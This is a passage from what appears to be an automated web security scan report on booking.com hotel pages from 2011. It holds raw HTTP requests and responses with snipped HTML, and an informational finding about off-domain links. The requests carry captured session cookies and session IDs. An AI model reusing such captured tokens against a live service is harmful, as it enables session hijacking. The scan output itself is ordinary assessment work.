2BH0wwqRX4iZWOY3i5iNEwebqtaoie%2BP7r6G%2FLQUM7pXZ4w0OMpQMyQi%2FVFaQETCe9980e9NIYR8OQkNVLofepzbE1hCbxXn6Q0kJJKpE%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:02:15 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232378
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554" />


<link rel="shortcut icon" href="http://s.bstatic.com/static/img/favicon.ico" />
<link rel="apple-touch-icon" href="http://s.bstatic.com/static/img/apple-touch-icon.png" />
<link rel="help" href="/general.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/faqmain" />

<link rel="search" type="application/opensearchdescription+xml" href="http://q.bstatic.com/static/opensearch/en-us.xml" title="Booking.com online hotel reservations" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/main.1191.css" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/popups.1191.css" media="screen" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/hotel.1191.css" media="screen" />


<!--[if lte IE 8]>
...[SNIP]...
<a href="http://www.booking.com/index.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101" title="Booking.com" style="text-decoration: none;">


<img id="globe" src="http://s.bstatic.com/static/img/experiments/logo-full.png" width="116" height="119" alt="Book your hotel in Boston U.S.A." />


<img id="logo_nobg" src="http://s.bstatic.com/static/img/b25logo/woordmerk.png" width="222" height="25" alt="Booking.com online hotel reservations" />


<img id="tagline" src="http://r.bstatic.com/static/img/b25logo/tagline_us.png" width="186" height="15" alt="a priceline company" />


</a>
...[SNIP]...
<div id="homein" >

<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkin_year_month" rel="checkin_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
<div id="homeout">
<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkout_year_month" rel="checkout_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
pi/staticmap?center=42.348478%2c-71.095651&zoom=14&size=215x150&sensor=false&language=en&client=gme-booking&signature=S95XycZdD4rs6fKrCUW8YZCiUIQ="


class="hotel
show_map

exp_smallimg">


<img src="http://s.bstatic.com/static/img/marker-hotel-orange-large.png" alt="Current hotel" title="Hotel Commonwealth" />

</a>
...[SNIP]...
<a
style="line-height: 1.2em; "
href="/hotel/us/copley-square.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"
class="hotel_history_lnk">

<img

class="thumb jq_tooltippex"
src="http://s.bstatic.com/images/hotel/square40/169/1691256.jpg"
width="30"
height="30"
title="&lt;img src='http://r.bstatic.com/images/hotel/max300/169/1691256.jpg' /&gt;&lt;br&gt;&lt;strong&gt;Copley Square Hotel&lt;/strong&gt;"
alt="hotel Copley Square Hotel"
/>
Copley Square Hotel</a>
...[SNIP]...
<a href="/hotel/us/copley-square.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
</p>


<a id="share_hotel_history_fb" target="_blank" class="share_hotel_history_link jq_tooltip" href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Fss%3Did%3A56255%26si%3Dho%26label%3Dsocnet_fb_hh_sh%26aid%3D339528" title="Share these hotels on Facebook." name="Share these hotels on Facebook."><img id="share_hotel_history_fb_img" class="use_sprites icon_social_media_fb" src="http://s.bstatic.com/static/img/transparent.png" /></a>

<a id="share_hotel_history_t" class="share_hotel_history_link jq_tooltip share_t" target="_blank" href="http://twitter.com/intent/tweet?text=Help! Which hotel is best?" title="Share these hotels on Twitter." data-shorturl="http://www.booking.com/searchresults.html?ss=id:56255&si=ho&label=socnet_t_hh_sh&aid=339529" name="Share these hotels on Twitter."><img id="share_hotel_history_t_img" class="use_sprites icon_social_media_twitter" src="http://s.bstatic.com/static/img/transparent.png" /></a>
...[SNIP]...
772539b0ca101;tmpl=mailafriend_standalone;url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Fss%3Did%3A56255%26si%3Dho%3Blabel%3Dsocnet_maf_hh_sh%3Baid%3D339530;title=Booking.com: Welcome;notes="><img class="use_sprites icon_social_media_mailafriend" src="http://s.bstatic.com/static/img/transparent.png" /></a>
...[SNIP]...
</strong>"
>
<img
class="thumb hotel"
src="http://q.bstatic.com/images/hotel/square40/131/1314320.jpg"
width="30"
height="30"
alt="hotel Westin Copley Place, Boston"
/>

</a>
...[SNIP]...
<a href="/hotel/us/westin-copley-place.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
</strong>"
>
<img
class="thumb hotel"
src="http://s.bstatic.com/images/hotel/square40/562/562463.jpg"
width="30"
height="30"
alt="hotel BEST WESTERN PLUS Boston the Inn at Longwood Medical, Boston"
/>

</a>
...[SNIP]...
<a href="/hotel/us/best-western-boston-the-inn-at-longwood-medical.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
</strong>"
>
<img
class="thumb hotel"
src="http://r.bstatic.com/images/hotel/square40/283/2833172.jpg"
width="30"
height="30"
alt="hotel Radisson Hotel Boston, Boston"
/>

</a>
...[SNIP]...
<a href="/hotel/us/radison-boston.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<li>
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://www.google.com/bookmarks/mark?op=edit&bkmk=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fc-boston-massachusettes.en.html%3Futm_content%3Dtext-cr%3Butm_medium%3DSPPC%3Butm_source%3Dtripad%3Butm_term%3Dhotel-59554%3Baid%3D323804%26label%3Dsocnet_gb_h&title=Hotel%20Commonwealth, Boston - 63 Guest%20reviews on Booking.com&annotation=Check out Hotel%20Commonwealth on Booking.com for: Best Price Guaranteed, 63 Guest reviews, No booking fees" id="gb" title="Bookmark this hotel page with Google Bookmarks" name="on Google">Google</a>
</li>
<li>


<a rel="250 nofollow" class="jq_tooltip share_t" target="_blank" href="http://twitter.com/intent/tweet?text=Check out this hotel! Hotel Commonwealth " id="t" data-shorturl="http://www.booking.com/hotel/us/c-boston-massachusettes.html?label=socnet_t_h&aid=339529" title="Share a link to this hotel page on Twitter" name="on Twitter">Twitter</a>
...[SNIP]...
<li>
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://www.bebo.com/c/share?Url=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fc-boston-massachusettes.en.html%3Futm_content%3Dtext-cr%3Butm_medium%3DSPPC%3Butm_source%3Dtripad%3Butm_term%3Dhotel-59554%3Baid%3D323804%26label%3Dsocnet_b_h&TitleHotel%20Commonwealth, Boston - 63 Guest%20reviews on Booking.com" id="b" title="Share a link to this hotel page on Bebo" name="on Bebo">Bebo</a>
</li>
<li>
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://reddit.com/submit?url=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fc-boston-massachusettes.en.html%3Futm_content%3Dtext-cr%3Butm_medium%3DSPPC%3Butm_source%3Dtripad%3Butm_term%3Dhotel-59554%3Baid%3D323804%26label%3Dsocnet_r_h&title=Hotel%20Commonwealth, Boston - 63 Guest%20reviews on Booking.com" id="r" title="Share a link to this hotel page on Reddit" name="on Reddit">Reddit</a>
</li>
<li class="cl">
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://delicious.com/save?url=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fc-boston-massachusettes.en.html%3Futm_content%3Dtext-cr%3Butm_medium%3DSPPC%3Butm_source%3Dtripad%3Butm_term%3Dhotel-59554%3Baid%3D323804%26label%3Dsocnet_d_h&title=Hotel%20Commonwealth, Boston - 63 Guest%20reviews on Booking.com&notes=Check out Hotel%20Commonwealth on Booking.com for: Best Price Guaranteed, 63 Guest reviews, No booking fees" id="d" title="Bookmark this hotel page with Delicious" name="on Delicious">Delicious</a>
...[SNIP]...
<li class="cl">
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://www.myspace.com/Modules/PostTo/Pages/?u=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fc-boston-massachusettes.en.html%3Futm_content%3Dtext-cr%3Butm_medium%3DSPPC%3Butm_source%3Dtripad%3Butm_term%3Dhotel-59554%3Baid%3D323804%26label%3Dsocnet_my_h&t=Hotel%20Commonwealth, Boston - 63 Guest%20reviews on Booking.com&l=3&c=Check out Hotel%20Commonwealth on Booking.com for: Best Price Guaranteed, 63 Guest reviews, No booking fees" id="my" title="Share a link to this hotel page on MySpace" name="on MySpace">MySpace</a>
...[SNIP]...
</style>


<a
target="_blank"
href="http://s.bstatic.com/images/hotel/max300/127/1278290.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://s.bstatic.com/images/hotel/max300/127/1278290.jpg' />"


style="background-position: 0 -240px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/106/1064883.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/106/1064883.jpg' />"


style="background-position: 0 0;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://s.bstatic.com/images/hotel/max300/122/1223786.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://s.bstatic.com/images/hotel/max300/122/1223786.jpg' />"


style="background-position: 0 -80px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/122/1223788.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/122/1223788.jpg' />"


style="background-position: 0 -120px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/351/3519940.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/351/3519940.jpg' />"


style="background-position: 0 -280px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/458/4582486.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/458/4582486.jpg' />"


style="background-position: 0 -360px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/458/4582479.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/458/4582479.jpg' />"


style="background-position: 0 -320px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://s.bstatic.com/images/hotel/max300/122/1223789.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://s.bstatic.com/images/hotel/max300/122/1223789.jpg' />"


style="background-position: 0 -160px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/122/1223790.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/122/1223790.jpg' />"


style="background-position: 0 -200px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/106/1064885.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/106/1064885.jpg' />"


style="background-position: 0 -40px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/458/4582543.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/458/4582543.jpg' />"


style="background-position: 0 -400px;"

onclick="return false;"
>
</a>
...[SNIP]...
</b> represents the hotel's performance in areas such as cleanliness, comfort, value for money etc. ">100% Hotel reliability <img src="http://r.bstatic.com/static/img/info.png" style="margin-left: 3px; margin-bottom: -3px;" /></h6>
...[SNIP]...
<span><img src="http://s.bstatic.com/static/img/transparent.png" width="1" height="1" alt="" />When would you like to stay at Hotel Commonwealth?</span>
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkin_year_month" rel="checkin_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="use_sprites icon_calendar" /></a>
...[SNIP]...
<a class="calendar reqJS inlineJsRequired calendarLink" href="#checkout_year_month" rel="checkout_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="use_sprites icon_calendar" /></a>
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkin_year_month" rel="checkin_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="use_sprites icon_calendar" /></a>
...[SNIP]...
<a class="calendar reqJS inlineJsRequired calendarLink" href="#checkout_year_month" rel="checkout_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="use_sprites icon_calendar" /></a>
...[SNIP]...
</strong>"
href="/hotel/us/radison-boston.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"
>
<img
class="hotelImg"
src="http://s.bstatic.com/images/hotel/square90/283/2833172.jpg"
width="60" height="60"
title="Radisson Hotel Boston"
alt="hotel"/>

</a>
...[SNIP]...
<a href="/hotel/us/radison-boston.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"><img src="http://q.bstatic.com/static/img/icons/stars/3sterren-small5.png" alt="3-star" /></a>
...[SNIP]...
<span class="room">
<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 718.20" /> Double Room <span class="price">
...[SNIP]...
</strong>"
href="/hotel/us/di-saugus.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"
>
<img
class="hotelImg"
src="http://s.bstatic.com/images/hotel/square90/149/1493811.jpg"
width="60" height="60"
title="Holiday Inn Express Saugus Logan Airport"
alt="hotel"/>

</a>
...[SNIP]...
<a href="/hotel/us/di-saugus.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"><img src="http://s.bstatic.com/static/img/icons/stars/2sterren-small5.png" alt="2-star" /></a>
...[SNIP]...
<span class="room">
<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 418" /> Double Room <span class="price">
...[SNIP]...
<span>
<img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
General
</span>
...[SNIP]...
<span>
<img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Activities
</span>
...[SNIP]...
<span>
<img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Services
</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""

/>
Internet</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""

/>
Parking</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Check in</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Check out</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Cancellation / Prepayment</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Children and extra beds</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Pets</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Accepted credit cards</span>
...[SNIP]...
<a title="Ready to book? Change your dates" id="top_link" href="#availability_target" onclick="blockdisplay(1);"><img src="http://s.bstatic.com/static/img/transparent.png"
alt="Ready to book? Change your dates"
title="Go to the top of the page"
class="use_sprites icon_top"
/>

<span>
...[SNIP]...
<div style="text-align:center;padding:3em;"><img src="http://r.bstatic.com/static/img/loading_filterbox.gif" alt="loading..." /></div>
...[SNIP]...
<a title="Ready to book? Change your dates" id="top_link" href="#availability_target" onclick="blockdisplay(1);"><img src="http://s.bstatic.com/static/img/transparent.png"
alt="Ready to book? Change your dates"
title="Go to the top of the page"
class="use_sprites icon_top"
/>

<span>
...[SNIP]...
</span>
<a id="share_popup_fb" class="fb_share" rel="250 nofollow" target="_blank" href="http://www.facebook.com/share.php?u=http://www.booking.com/hotel/us/c-boston-massachusettes.html?label=socnet_fb_h_shp&aid=339528" title="Share a link to this hotel page on Facebook" name="on Facebook"><img class="share_popup_img use_sprites icon_social_media_fb" src="http://s.bstatic.com/static/img/transparent.png" /></a>
<a rel="250 nofollow" id="share_popup_t" class="share_t" target="_blank" href="http://twitter.com/intent/tweet?text=Check out this hotel! Hotel Commonwealth" id="t" title="Share a link to this hotel page on Twitter" data-shorturl="http://www.booking.com/hotel/us/c-boston-massachusettes.html?label=socnet_t_h&aid=339529" name="on Twitter"><img class="share_popup_img use_sprites icon_social_media_twitter" src="http://s.bstatic.com/static/img/transparent.png" /></a>
...[SNIP]...
3Baid%3D339530;title=Hotel%20Commonwealth, Boston - 63 Guest%20reviews on Booking.com;notes=Check out Hotel%20Commonwealth on Booking.com for: Best Price Guaranteed, 63 Guest reviews, No booking fees"><img class="share_popup_img use_sprites icon_social_media_mailafriend" src="http://s.bstatic.com/static/img/transparent.png" /></a>
</span>

<div id="share_popup_close"><img class="share_popup_img use_sprites icon_share_popup_close" src="http://s.bstatic.com/static/img/transparent.png" /></div>
...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>


<img src="http://s.bstatic.com/static/img/marker-hotel-blue.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-hotel-orange.png" style="display: none;" />
<img src="http://q.bstatic.com/static/img/marker-hotel-grey.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-hotel-orange-large.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-airport.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-airport-large.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-landmark.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-landmark-large.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-city.png" style="display: none;" />
<img src="http://q.bstatic.com/static/img/marker-city-large.png" style="display: none;" />


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/maps_v3.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/hotel.1191.js"></script>
...[SNIP]...

19.181. http://www.booking.com/hotel/us/copley-square.en-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9Yc0ZDC9Mu1EAoq1YwiyYkrOHiSAuf28JqI%2BHOflGdlheWSd4aqQ4S9kWAAPfsgw9D66T4wFMCvqGXXx5W9GuJCr25Uqmhj2UpMobDN%2FaI4MouzypAXiHMMHYcyBghPwRPhIR0vlB6Ol8jmLM553G35F%2B2EC9Ct3b6%2FTJ5NqEwZrR9Q%2FH0ukz26yit6QyLTSqcuI2HLQ0VsBUAFVCwlLNxmZuDxyotE%2FwnVYDN1NaPr%2BQ2jMezA%2BQ93xNHE6sHvC2H6NcKqXTt11C7HRYqikso%2BSN%2F4epQIaoqYzVIVHsmZRY8UEQjW5%2FO3Xg3BPtScIum6RN1CcSwBbw2larrInKU6nVmRnGhZFZSu5P%2BH00JmkPzIwtu%2BRR4GgAt2IGq05uSTlyXitF3cA50IfBrXVmzdkzGeF1VQCDl7z%2Bt%2FJ%2FKFnjy9xLhsGvqxJch%2BJrNhkB55c%2FG59roS3buqyAq0TEWAvcdvIs6%2F2UswXdj84aVmCpFWEP7U4%2B3xDuwHi0ZNcE5TtRm2o%2F%2BoVJd9F2TJoqWCE3rBlE2yxL6TdLx9MVgUJv1gc41uBXXGirUBK4SUch8xbCWkl6QTjnYqTCwy8Q%2B%2BmmvhcEChhoBMA6VhIARqLepo8zZ4NgkZsML2nekGw6xRTGM3ca9%2BhMNuoQerjyZvoEu%2FiiH5epR8lpu1HdXNkP0JMNwUWbXzVoEFW92XZe0L8NnZnv34ij1h7BNEk%2BNfqH74wSscgE3wSh0k6ppJE%2Fv9Q8CWuQjBxGKNwr1f2m4Y5TBAI%2BXMckHMBU4%2FG7kpH9XWlaEE4jIt3ALDerskaJo%2BV8L3WCqL8TpX%2BjJlIwJorneFW4eRPNnjpO7sa5YnjqXQwY7kXZWJmN0iVllVt%2FYiNv%2BJq27oaMfjKg7Cz%2BYMz6xSi358Az%2BUCKrCbX68Fejx4UjmRPykDsTcLdD%2BEgyrL1SNvGkFwireGYoqBlUwvX3GYoLcIqONZ4Yuut3w9lOOQNlzXsEUDgQVh%2BI9y7LbESfSW6qGzvYcPpv9xT5TvyQz8z%2FdLDnJJE4D%2BCX2OqQECV32gxKWqLDPgPMvd5a6f3QefT%2BprihDvGDFB%2BprGC%2BccmQL6Yqlr1LqR8bUfmLkF2zwpJUXtO99dcZUw7e6ZxAAvL%2BYr9RrWIU3HuipBrjB%2BVvi9H6DSiBWFxPZk8JvSfmEGq6tDPdi7w2Eyzhum14uflewChdQsVk0SSagrC%2FFdQVu0SyWSHpLf9foVCCVupPIIZ53zHlztSaLpLIAQ7h0rb0XNYPeGEKZaU%2F5jXL2MP2Dnersuv1CqSOtI2VraCP4a6Djbv98BjLgf8UNBaznO6oUgiu4eKAEvOAmLbwIDPAnRTWvBX6d4fP68Dujy0%2FEg9nDhyC4YyPhd8sGLqQCt8iqt3wu7ZlqNcOFUdd6sQlb91qP8GTmymg04fczRJUsyLLBjH4iyApv8l; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 248794
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/hotel/us/copley-square.en.html" />


<link rel="shortcut icon" href="http://s.bstatic.com/static/img/favicon.ico" />
<link rel="apple-touch-icon" href="http://s.bstatic.com/static/img/apple-touch-icon.png" />
<link rel="help" href="/general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/faqmain" />

<link rel="search" type="application/opensearchdescription+xml" href="http://q.bstatic.com/static/opensearch/en-us.xml" title="Booking.com online hotel reservations" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/main.1191.css" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/popups.1191.css" media="screen" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/hotel.1191.css" media="screen" />


<!--[if lte IE 8]>
...[SNIP]...
<a href="http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101" title="Booking.com" style="text-decoration: none;">


<img id="globe" src="http://s.bstatic.com/static/img/experiments/logo-full.png" width="116" height="119" alt="Book your hotel in Boston U.S.A." />


<img id="logo_nobg" src="http://s.bstatic.com/static/img/b25logo/woordmerk.png" width="222" height="25" alt="Booking.com online hotel reservations" />


<img id="tagline" src="http://r.bstatic.com/static/img/b25logo/tagline_us.png" width="186" height="15" alt="a priceline company" />


</a>
...[SNIP]...
<div id="homein" >

<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
